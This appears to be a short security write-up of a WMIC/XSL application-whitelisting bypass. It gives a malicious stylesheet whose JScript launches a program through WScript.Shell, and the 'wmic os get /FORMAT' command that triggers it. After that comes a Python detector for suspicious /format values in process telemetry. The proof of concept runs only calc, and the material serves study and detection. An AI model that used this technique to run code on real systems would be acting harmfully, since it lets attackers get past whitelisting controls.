Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo:
Define the XSL file containing the JScript payload:
evil.xsl

```xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("calc");
	]]> </ms:script>
</stylesheet>
```
Invoke any wmic command now and specify /format pointing to the evil.xsl:
attacker@victim

```
wmic os get /FORMAT:"evil.xsl"
```
Calculator is spawned by svchost.exe:
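From the detection side, the invocation above stands out in process-creation telemetry because `/format` names a file rather than one of WMIC's built-in format keywords. The sketch below is an added example, not part of the original notes; the event field names (`image`, `command_line`, `pid`), the sample events and the built-in keyword list are assumptions to adapt to your own logging.

```python
import re

# WMIC's built-in /format keywords (assumed allow-list; extend for your estate).
BUILTIN_FORMATS = {"csv", "hform", "htable", "list", "mof",
                   "rawxml", "table", "value", "xml"}

# Captures the /format value, quoted or bare, case-insensitively.
FORMAT_RE = re.compile(r'/format\s*:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def wmic_format_target(image, command_line):
    """Return the /format value when wmic.exe is given a non-built-in one."""
    exe = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe != "wmic.exe":
        return None
    match = FORMAT_RE.search(command_line)
    if match is None:
        return None
    value = (match.group(1) if match.group(1) is not None else match.group(2)).strip()
    return None if value.lower() in BUILTIN_FORMATS else value


def find_suspicious(events):
    """Return (pid, stylesheet) pairs for events that warrant review."""
    hits = []
    for event in events:
        target = wmic_format_target(event["image"], event["command_line"])
        if target is not None:
            hits.append((event["pid"], target))
    return hits


# Constructed process-creation events (hypothetical field names and values).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic os get /FORMAT:"evil.xsl"'},
    {"pid": 4188, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic process list /format:csv"},
    {"pid": 4201, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic os get Caption /format:list"},
    {"pid": 4310, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe /format:evil.xsl"},
]

if __name__ == "__main__":
    for pid, stylesheet in find_suspicious(SAMPLE_EVENTS):
        print(f"pid={pid} wmic /format -> {stylesheet}")
```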